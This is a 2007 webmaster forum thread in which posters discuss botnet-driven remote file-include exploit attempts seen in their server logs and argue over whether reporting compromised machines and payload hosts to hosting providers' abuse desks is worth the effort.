Forum Moderators: open
This is becoming an increasing problem that I never noticed much until a couple of months ago and now it's pretty much a non-stop daily event.
What you see isn't a spider or a crawler, it's an infected machine attempting to infect your machine with a "FILE INCLUDE" or "FILE DOWNLOADER" exploit.
The first 2 examples are trying to hit your site with the Coppermine and WordPress exploit:
[securitytracker.com...]
They are also attempting a Limbo CMS exploit:
[securitytracker.com...]
If you have any of this software on your server, you may already be breached, upgrade ASAP!
Then, send the host an AUP report about their compromised machine, complete with log file entries that detail the attack.
In this case, you'll need to send a report to HOPONE about the 66.148.71.nnn and iPowerWeb, shich is literally filthy with infected servers, about the target script at "morfeus.us/M.php". At the moment it appears the site "morfeus.us" has already been shutdown on iPowerWeb so you only need to address the source this time.
See, that's how these guys work. They host the file they are including on one server, and try to exploit your from another server, or bunch of servers, that downloads the file from the first server. You have to neutralize both servers to stop it and then keep an eye on whether it comes back again or not and repeat.
[edited by: incrediBILL at 1:08 am (utc) on Jan. 23, 2007]
A host enters the realm of the internet with either a weak UAG or a relutance to enforce their UAG.
The hosts customers begin bombarding other websites with queries/crawls/spiders or however you wish to name the episodes.
Webmasters are "compelled" to notify the provider "for the sake or world peace and saving the entire internet" from a security hack?
WHY?
In most instances to be responded to with an automated reply that requests information that was included in the intial report!
The provider created this problem! Let the provider solve the problem!
BTW, thanks for the insight.
I'm sick of being a victim in this cybermess and I'm using everything at my disposal.
If everyone did sometime proactive for the entire community, instead of just dropping people in the firewall and solving only YOUR problem, the situation would get better instead of worse.
Bill,
Participation in this forum is "proactive", expecially when the activity has exceeded six years.
There was a time when the forum activity/announcemts were instanteous and for the most part without moderation, however that was brought to halt by users attempting to stifle their competitors.
Best of results on your venture.
ok, what things can you do that are not "on your site" to help alleviate the issue?
Brett,
I'm assuming your intervention and separation of the threads is because you realize the possibility of something worthwhile in Forum 11, as opposed to our normal ramblings ;)
My profile shows that I've been a member since 2001, however it was actually earlier.
I use a different pseudo in Newsgroups and online forums and in 2001 I flip-flopped the pseudo's. NG's and another person providing a URL to Webamster World is how I originally found this forum.
During my 6-7 years of participation at Webmaster World (and beyond my most recent ventures into other WW Forums), 99.99% of my participation has been confined to Forum 11 (Search Engine Spider Identification).
The fourm charter although created with good intent is not really what this forum has been utilized for. NOT yesterday and certainly not today!
SSID did have a period of approximately nine months were the forum was no longer active.
During the past 6-7 years, we've had a variety of participants come through the doors with a variety of opinions and insights.
For the most part the forum remains functional and on topic with very little off-topic chatter.
At one time and for appoximately two years, we had a bot creator chasing many threads providing insights from a BOTS point-of-view. Some of the insights were benefical and thoughful, however the injecture of the comments was only intended to deter "denial of access" by forum participants and potential non-forum participants/webmasters.
We've had other such injectures, however they ususally don't stay long.
AUP and/or UAG
The first return on a google from a major internet provider provides some interesting insight.
[google.com...]
The lines of the providers AUP are a fairly standard presentation of policy for most internet providers.
The policies are also double-talk (BS) and rarely enforced.
Any provider who made the decision to properly enforce these policies in today's internet would accomplishe two things:
1) Invaribly increasing their staff and/or expenses to
facilitate policy.
2) Be closing their business doors before long.
WHY?
The primary weakness is in use of the terms "network and effect of actions on other subscribers".
A customers actions that result in a webmasters denial of access potentially effects all (until recent changes by providers in subnet structures of IP ranges) the providers customers.
In late-November of 2001 I received the following reply from a major internet provider when I submitted an AUP/UAG violation and supporting that submission with logs and links from the providers own UAP/UAG:
"Blocking #*$!#*$! IP's will not rectify your situation, as it would not prevent other websites from linking your images. There are technological solutions to prevent people from linking your images. I am not sure what kind of http server you are currently running, but here is a link to a guide for url rewriting with apache webserver,
[httpd.apache.org...] . I can understand your frustration, as I was in the same position as you are at one point and found that solving the problem was better than patching it."
end of quote
After reading and re-reading the above, my participation at SSID increased. My awareness of the capabilities of using htaccess to accomplish what the provider suggested as "technological solutions" are the solutions. NOT only for images, however full implementaion of access for accountability.
Up until late 2001, I believed in the tooth-fairy, Santa Clause, the Easter Bunny and also that internet providers would act responsibly in enforcement of AUP/UAG and feedback from webmasters providing insights.
These days (same old song) we have some new blood in forum 11 suggesting that methods of which many participants have attempted over and again (another example is Gary's experience with Yahoo) are new and original concepts to solve world peace ;) or at least provide "proactivity".
Encouraging others to determine what is beneficial or detrimental to their own websites is the solution.
As is continued re-evaluation of providers actions and denial of access on each of our own website (s).
Communication with internet providers is a waste of time.
Don
Communication with internet providers is a waste of time.
Don, sadly I think you are jaded and should change your statement to " Communication with SOME internet providers is a waste of time." which is absolutely true. However, don't lump them all into your blanket statement as I've just ended fighting a major attack and many of them were quite helpful. Some responded the same day, others took a couple of days, some took over a week but only a couple were impossible to deal with but I found a way to make them pay attention as well.
As a matter of fact, in the last month I've had several of them personally email me back, and a couple of admins actually CALLED me on the phone, one from Canada even, and coordinated collecting and sharing information about the botnet.
ok, what things can you do that are not "on your site" to help alleviate the issue?
When I started being seriously attacked I had almost 200 IPs involved and after contacting the domain owner of the rented server and filing AUP reports over 50% of them were shut down within a week. I monitored the log files and the same IPs came back day after day and suddenly they vanished in chunks per hosting company as they were being resolved.
True, just blocking the IPs involved can help protect just YOUR server but failing to report them leaves the botnet intact, which could also be used to infect or DDoS someone else's server. I've seen all the code that was involved with the botnets attacking my server and it's complete with DDoS capabilities, nothing you want left sitting out there.
The majority of the servers involved were dedicated servers that had been breached and the person renting the server usually doesn't want his business hacked. When possible, I notified the breached server/site owner that was being used as an unwilling host for the attack. Also write directly to abuse@ the hosting company, or CC the host in the email to the person renting their server.
When I notified the person renting the server and/or filed the AUP reports with the host, I included the following information:
1. A sample of the log file showing the IP involved in the attack
2. A brief description of the exploit they were trying to use
3. A link to a security site with more information, including the types of files that might be found on their server in some cases.
Remember, the ISP has to protect their clients and, except in extreme circumstances, won't just shut down a box without investigation on the first complaint. This is to protect their customers from aggressive competitors or other malicious parties that could falsely report someone's server just to get them taken offline. Be patient and report each attack from the ISP's network so they can see it's a real repeated problem and not just a false complaint.
Now the second problem, maybe the more important problem, the host where the file being downloaded as part of the exploit is hosted. In the case of the botnet hitting my box, the attacks all came from places other than the location hosting the hackers package as they didn't want that shut down as all the bots download the file from the same location. To protect others from being infected, getting this file offline ASAP should be your top priority.
Sometimes you find a botnet with a permanent file download location such as some notorious ones hosted in Russia, and the best thing you can do is block that entire network from your server as they will never fix the problem, it's been years now.
If you're lucky, you might knock the botnet C&C's offline (Command & Controls) [eweek.com] which slowed them down a little and sometimes it took a several days before the attacks resumed.
As a last resort of desperation, when you have a host within your legal jurisdiction that refuses to honor their AUP, I found a quick C&D regarding halting the hacking activities coming within their network will get their attention.
You may want to report these incidents to law enforcement or cyber crime task forces as well because some of the operators of botnets [theregister.co.uk] have been caught and are going to jail. [theregister.co.uk]
FWIW, I've also effectively used the AUP as a tool to shut down some other bad bots and MFA scrapers as well, but that's a different post.
[edited by: incrediBILL at 9:32 pm (utc) on Jan. 23, 2007]
Please feel free to drop-in anytime, after all it is your website ;)
